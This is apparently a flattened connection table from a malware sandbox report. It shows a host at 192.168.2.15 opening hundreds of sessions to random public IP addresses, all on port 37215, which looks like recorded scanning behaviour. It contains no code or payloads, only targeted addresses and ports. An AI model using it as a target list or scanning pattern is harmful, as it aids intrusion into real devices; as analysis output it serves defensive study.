                                              24724192.168.2.1547690186.234.0.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24725192.168.2.1533040102.212.111.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24726192.168.2.1537186156.154.140.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24727192.168.2.1548694222.27.164.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24728192.168.2.1559938121.155.55.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24729192.168.2.1547976138.123.247.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24730192.168.2.1547272121.169.43.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24731192.168.2.154217631.88.102.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24732192.168.2.1541170186.220.84.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24733192.168.2.1548932157.33.50.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24734192.168.2.1551214121.149.211.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24735192.168.2.1544150156.204.205.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24736192.168.2.154752831.26.172.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24737192.168.2.1559322190.6.84.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24738192.168.2.1555896122.1.224.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24739192.168.2.1538256210.147.100.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24740192.168.2.1555466121.6.222.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24741192.168.2.1535106222.41.184.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24742192.168.2.1540692138.27.8.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24743192.168.2.1535500102.171.104.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24744192.168.2.1550744138.56.93.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24745192.168.2.1545852156.245.70.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24746192.168.2.1558288102.150.35.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24747192.168.2.1535534156.251.113.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24748192.168.2.1555810156.108.131.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24749192.168.2.153397441.241.185.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24750192.168.2.153327289.153.110.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24751192.168.2.1536230197.87.96.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24752192.168.2.1557504197.152.169.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24753192.168.2.1533426156.27.80.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24754192.168.2.1544876190.254.88.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24755192.168.2.1533212121.113.183.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24756192.168.2.1556636121.138.219.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24757192.168.2.1557632136.3.241.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24758192.168.2.156053037.198.72.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24759192.168.2.155774437.185.149.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24760192.168.2.1552142186.138.173.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24761192.168.2.1537854138.168.230.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24762192.168.2.154714637.4.75.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24763192.168.2.1533450222.179.205.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24764192.168.2.1558318157.123.13.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24765192.168.2.1542276186.44.223.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24766192.168.2.1559466187.239.107.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24767192.168.2.1549172102.58.69.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24768192.168.2.153592841.74.8.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24769192.168.2.156074241.248.77.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24770192.168.2.154359641.144.246.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24771192.168.2.153278237.94.39.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24772192.168.2.153568037.115.198.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24773192.168.2.153313637.207.62.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24774192.168.2.1560894122.101.52.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24775192.168.2.1534516186.240.49.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24776192.168.2.155822831.104.141.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24777192.168.2.1543536190.43.249.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24778192.168.2.1547950102.51.169.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24779192.168.2.1557984138.252.16.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24780192.168.2.1533676222.103.252.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24781192.168.2.155686845.227.154.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24782192.168.2.1539236210.131.123.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24783192.168.2.1534026102.141.43.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24784192.168.2.1545344186.80.4.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24785192.168.2.154135445.74.152.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24786192.168.2.155521631.3.54.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24787192.168.2.1541092186.224.230.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24788192.168.2.155374841.46.201.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24789192.168.2.155908245.50.174.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24790192.168.2.154878694.29.42.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24791192.168.2.1556874190.167.30.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24792192.168.2.155565631.92.68.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24793192.168.2.155399841.49.163.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24794192.168.2.1542556190.52.191.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24795192.168.2.1542270190.247.127.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24796192.168.2.1559056102.52.190.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24797192.168.2.1548802157.249.87.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24798192.168.2.1557900181.144.186.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24799192.168.2.1554542181.59.105.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24800192.168.2.1551182181.147.125.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24801192.168.2.1540994186.218.74.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24802192.168.2.155155241.225.209.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24803192.168.2.155395245.137.29.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24804192.168.2.155050445.218.120.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24805192.168.2.1533698156.202.37.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24806192.168.2.153979094.69.225.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24807192.168.2.1559608181.82.39.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24808192.168.2.1558636197.121.209.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24809192.168.2.1535390181.69.139.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24810192.168.2.154262460.79.236.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24811192.168.2.1538634186.27.76.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24812192.168.2.1556860121.55.0.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24813192.168.2.1536212181.85.241.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24814192.168.2.154533894.22.161.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24815192.168.2.1550506222.192.4.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24816192.168.2.154057845.107.53.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24817192.168.2.1553048138.212.53.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24818192.168.2.1559248138.49.121.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24819192.168.2.1551810156.42.227.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24820192.168.2.154761494.253.249.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24821192.168.2.154695831.220.223.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24822192.168.2.15494329.103.7.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24823192.168.2.155607431.253.138.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24824192.168.2.153450494.29.254.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24825192.168.2.1538628102.247.247.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24826192.168.2.155371694.25.8.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24827192.168.2.153367641.16.66.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24828192.168.2.1544598138.21.162.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24829192.168.2.1547432157.25.254.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24830192.168.2.1535980222.14.102.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24831192.168.2.1549998121.184.229.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24832192.168.2.1540320156.97.183.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24833192.168.2.1547276138.230.37.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24834192.168.2.1555366197.52.46.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24835192.168.2.1545944102.63.58.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24836192.168.2.154778094.60.165.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24837192.168.2.155326631.98.16.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24838192.168.2.154269637.185.255.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24839192.168.2.155085437.69.66.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24840192.168.2.1550636102.188.19.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24841192.168.2.1539318197.95.55.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24842192.168.2.1538368222.212.56.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24843192.168.2.154930831.198.208.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24844192.168.2.1538480190.91.161.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24845192.168.2.1534222190.72.47.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24846192.168.2.154105018.168.45.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24847192.168.2.155530037.222.89.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24848192.168.2.1537054190.3.182.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24849192.168.2.1542948157.247.151.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24850192.168.2.1544992121.206.254.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24851192.168.2.154016031.14.137.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24852192.168.2.153445894.149.193.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24853192.168.2.154220494.43.66.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24854192.168.2.154488645.134.122.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24855192.168.2.154719094.94.203.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24856192.168.2.1541854221.137.113.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24857192.168.2.1560270121.157.48.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24858192.168.2.1548448121.200.239.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24859192.168.2.1538722181.226.125.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24860192.168.2.1555690190.168.216.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24861192.168.2.1546980157.137.19.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24862192.168.2.1559308138.204.94.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24863192.168.2.153363894.153.218.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24864192.168.2.1536610102.25.92.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24865192.168.2.153485831.174.87.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24866192.168.2.154599841.219.68.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24867192.168.2.1540264197.72.67.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24868192.168.2.1537286102.152.245.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24869192.168.2.155105637.139.222.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24870192.168.2.1534506122.26.232.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24871192.168.2.1537992102.67.76.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24872192.168.2.1550394121.213.117.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24873192.168.2.1535154181.41.159.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24874192.168.2.1543734197.139.157.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24875192.168.2.1550400102.244.249.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24876192.168.2.154878241.159.190.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24877192.168.2.1553004102.52.113.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24878192.168.2.1536532138.128.3.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24879192.168.2.1551184190.140.172.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24880192.168.2.1536670102.160.239.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24881192.168.2.1534284181.98.60.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24882192.168.2.1554174121.99.239.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24883192.168.2.1551160156.68.194.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24884192.168.2.153686831.235.11.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24885192.168.2.154514694.176.209.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24886192.168.2.1533272197.237.9.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24887192.168.2.1554470121.138.41.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24888192.168.2.1556194102.103.77.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24889192.168.2.1557162122.217.46.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24890192.168.2.1537752156.132.249.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24891192.168.2.154399894.87.70.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24892192.168.2.154056645.142.106.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24893192.168.2.1553016186.160.19.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24894192.168.2.1544192156.46.63.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24895192.168.2.1538012181.221.21.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24896192.168.2.1560512186.110.220.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24897192.168.2.1554092186.109.200.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24898192.168.2.154373637.110.36.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24899192.168.2.1548056122.33.222.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24900192.168.2.154400231.215.251.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24901192.168.2.1539424222.234.80.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24902192.168.2.1543800121.202.144.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24903192.168.2.1558878121.158.244.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24904192.168.2.1548980222.46.141.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24905192.168.2.155363431.64.167.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24906192.168.2.1544598156.238.28.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24907192.168.2.1533978157.231.208.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24908192.168.2.1560192122.38.144.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24909192.168.2.154221245.164.104.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24910192.168.2.154244237.100.55.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24911192.168.2.1559154186.203.70.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24912192.168.2.1556204181.51.107.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24913192.168.2.153277031.221.110.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24914192.168.2.1548604190.85.208.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24915192.168.2.153626041.132.112.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24916192.168.2.154886241.25.248.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24917192.168.2.155466831.65.56.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24918192.168.2.1551604156.33.200.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24919192.168.2.1544530190.26.25.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24920192.168.2.1558170222.214.110.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24921192.168.2.1533598222.255.184.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24922192.168.2.1553134122.95.157.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24923192.168.2.153960838.148.146.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24924192.168.2.1549104121.14.29.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24925192.168.2.1539642122.104.33.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24926192.168.2.1557258121.219.111.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24927192.168.2.1546572186.43.206.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24928192.168.2.1549612181.219.158.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24929192.168.2.1555018138.102.28.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24930192.168.2.1557992122.170.250.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24931192.168.2.153862841.19.113.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24932192.168.2.1546642121.232.205.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24933192.168.2.1539492222.245.59.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24934192.168.2.1537620186.41.64.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24935192.168.2.1534278197.52.242.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24936192.168.2.1549258157.98.203.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24937192.168.2.1536798138.13.34.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24938192.168.2.1538250102.241.188.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24939192.168.2.154135441.120.226.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24940192.168.2.1541170157.117.245.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24941192.168.2.1559516157.159.53.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24942192.168.2.155564241.213.142.10237215
